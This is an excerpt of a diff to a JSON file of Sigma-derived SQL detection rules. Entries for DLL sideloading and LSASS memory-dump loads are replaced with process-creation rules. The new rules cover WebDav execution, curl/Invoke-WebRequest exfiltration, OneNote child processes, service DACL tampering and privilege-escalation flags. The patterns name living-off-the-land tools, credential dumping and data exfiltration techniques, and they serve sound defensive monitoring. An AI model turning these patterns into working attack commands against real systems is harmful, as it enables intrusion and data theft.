ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" ], - "filename": "image_load_cmstp_load_dll_from_susp_location.yml" + "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" }, { - "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", - "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", - "status": "experimental", - "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", - "author": "Greg (rule)", + "title": "WebDav Client Execution", + "id": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", + "status": "test", + "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1202", - "cve.2022.30190" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\')" ], - "filename": "image_load_dll_sdiageng_load_by_msdt.yml" + "filename": "proc_creation_win_rundll32_webdav_client_execution.yml" }, { - "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", - "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", + "title": "Suspicious Svchost Process", + "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", "status": "experimental", - "description": "Detects DLL sideloading of system dlls that are not present on the system by default. Usually to achieve techniques such as UAC bypass and privilege escalation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious svchost process start", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentProcessName = '') OR (ParentProcessName = '') OR (ParentProcessName = '-')))" ], - "filename": "image_load_side_load_non_existent_dlls.yml" + "filename": "proc_creation_win_svchost_susp_parent_process.yml" }, { - "title": "Potential Rcdll.DLL Sideloading", - "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", - "status": "experimental", - "description": "Detects potential DLL sideloading of rcdll.dll", - "author": "X__Junior", + "title": "Suspicious aspnet_compiler.exe Execution", + "id": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", + "status": "test", + "description": "Execute C# code with the Build Provider and proper folder structure in place.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1127" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%aspnet\\_compiler.exe%' ESCAPE '\\')" ], - "filename": "image_load_side_load_rcdll.yml" + "filename": "proc_creation_win_lolbin_aspnet_compiler.yml" }, { - "title": "VMGuestLib DLL Sideload", - "id": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", - "status": "experimental", - "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Zip A Folder With PowerShell For Staging In Temp", + "id": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", + "status": "test", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ - "FP could occur if the legitimate version of vmGuestLib already exists on the system" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\VMware\\\\VMware Tools\\\\vmStatsProvider\\\\win32%' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\vmGuestLib.dll%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe' ESCAPE '\\') AND NOT (Signed = 'true'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Compress-Archive %' ESCAPE '\\' AND CommandLine LIKE '% -Path %' ESCAPE '\\' AND CommandLine LIKE '% -DestinationPath %' ESCAPE '\\' AND CommandLine LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "image_load_side_load_vmguestlib.yml" + "filename": "proc_creation_win_powershell_zip_compress.yml" }, { - "title": "Potential DLL Sideloading Using Coregen.exe", - "id": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171", + "title": "Suspicious RunAs-Like Flag Combination", + "id": "50d66fb0-03f8-4da0-8add-84e77d12a020", "status": "experimental", - "description": "Detect usage of DLL \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.", - "author": "frack113", + "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1055" + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\coregen.exe' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Silverlight\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -u system %' ESCAPE '\\' OR CommandLine LIKE '% --user system %' ESCAPE '\\' OR CommandLine LIKE '% -u NT%' ESCAPE '\\' OR CommandLine LIKE '% -u \"NT%' ESCAPE '\\' OR CommandLine LIKE '% -u ''NT%' ESCAPE '\\' OR CommandLine LIKE '% --system %' ESCAPE '\\' OR CommandLine LIKE '% -u administrator %' ESCAPE '\\') AND (CommandLine LIKE '% -c cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c \"cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c \"powershell%' ESCAPE '\\' OR CommandLine LIKE '% --command cmd%' ESCAPE '\\' OR CommandLine LIKE '% --command powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c whoami%' ESCAPE '\\' OR CommandLine LIKE '% -c wscript%' ESCAPE '\\' OR CommandLine LIKE '% -c cscript%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_coregen.yml" + "filename": "proc_creation_win_susp_privilege_escalation_cli_patterns.yml" }, { - "title": "Potential Iviewers.DLL Sideloading", - "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", - "status": "experimental", - "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", - "author": "X__Junior", + "title": "File or Folder Permissions Modifications", + "id": "37ae075c-271b-459b-8d7b-55ad5f993dd8", + "status": "test", + "description": "Detects a file or folder's permissions being modified or tampered with.", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1222.001" ], "falsepositives": [ - "Unknown" + "Users interacting with the files on their own (unlikely unless privileged users).", + "Dynatrace app" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\cacls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\icacls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND (CommandLine LIKE '%/grant%' ESCAPE '\\' OR CommandLine LIKE '%/setowner%' ESCAPE '\\' OR CommandLine LIKE '%/inheritance:r%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\takeown.exe' ESCAPE '\\') AND NOT ((CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\connectivity.history /reset' ESCAPE '\\') OR (CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\config.properties /grant :r %' ESCAPE '\\' AND CommandLine LIKE '%S-1-5-19:F%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_iviewers.yml" + "filename": "proc_creation_win_susp_file_permission_modifications.yml" }, { - "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", - "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "title": "Explorer Process Tree Break", + "id": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}%' ESCAPE '\\' OR (CommandLine LIKE '%explorer.exe%' ESCAPE '\\' AND CommandLine LIKE '% /root,%' ESCAPE '\\')))" ], - "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" + "filename": "proc_creation_win_explorer_break_process_tree.yml" }, { - "title": "DotNET DLL Loaded Via Office Applications", - "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", - "status": "test", - "description": "Detects any assembly DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Suspicious Microsoft OneNote Child Process", + "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", + "status": "experimental", + "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.t1566", + "attack.t1566.001", + "attack.initial_access" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "File located in the AppData folder with trusted signature" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" ], - "filename": "image_load_office_dotnet_assembly_dll_load.yml" + "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" }, { - "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", - "id": "8cde342c-ba48-4b74-b615-172c330f2e93", + "title": "Suspicious Execution of Shutdown to Log Out", + "id": "ec290c06-9b6b-4338-8b6b-095c0f284f10", "status": "experimental", - "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the rare use of the command line tool shutdown to logoff a user", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.defense_evasion", - "attack.t1003.001" + "attack.impact", + "attack.t1529" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND CommandLine LIKE '%/l%' ESCAPE '\\')" ], - "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" + "filename": "proc_creation_win_shutdown_logoff.yml" }, { - "title": "Unsigned Image Loaded Into LSASS Process", - "id": "857c8db3-c89b-42fb-882b-f681c7cf4da2", + "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", "status": "test", - "description": "Loading unsigned image (DLL, EXE) into LSASS process", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", + "author": "Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Valid user connecting using RDP" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND Signed = 'false')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "image_load_unsigned_image_loaded_into_lsass.yml" + "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" }, { - "title": "Python Py2Exe Image Load", - "id": "cbb56d62-4060-40f7-9466-d8aaf3123f83", + "title": "Suspicious Vsls-Agent Command With AgentExtensionPath Load", + "id": "43103702-5886-11ed-9b6a-0242ac120002", "status": "experimental", - "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", - "author": "Patrick St. John, OTR (Open Threat Research)", + "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", + "author": "bohops", "tags": [ "attack.defense_evasion", - "attack.t1027.002" + "attack.t1218" ], "falsepositives": [ - "Legitimate Py2Exe Binaries", - "Known false positive caused with Python Anaconda" + "False positives depend on custom use of vsls-agent.exe" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Description = 'Python Core' AND NOT ((NewProcessName LIKE '%Python%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\')) OR (NewProcessName = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\vsls-agent.exe' ESCAPE '\\' AND CommandLine LIKE '%--agentExtensionPath%' ESCAPE '\\') AND NOT (CommandLine LIKE '%Microsoft.VisualStudio.LiveShare.Agent.%' ESCAPE '\\'))" ], - "filename": "image_load_susp_python_image_load.yml" + "filename": "proc_creation_win_vslsagent_agentextensionpath_load.yml" }, { - "title": "FoggyWeb Backdoor DLL Loading", - "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", - "status": "test", - "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected \"version.dll\" dll", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Data Exfiltration Activity Via CommandLine Tools", + "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "status": "experimental", + "description": "Detects the use of various CLI utilities exfiltrating data via web requests", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_malware_foggyweb_nobelium.yml" + "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" }, { - "title": "Alternate PowerShell Hosts - Image", - "id": "fe6e002f-f244-4278-9263-20e4b593827f", + "title": "Suspicious IIS URL GlobalRules Rewrite Via AppCmd", 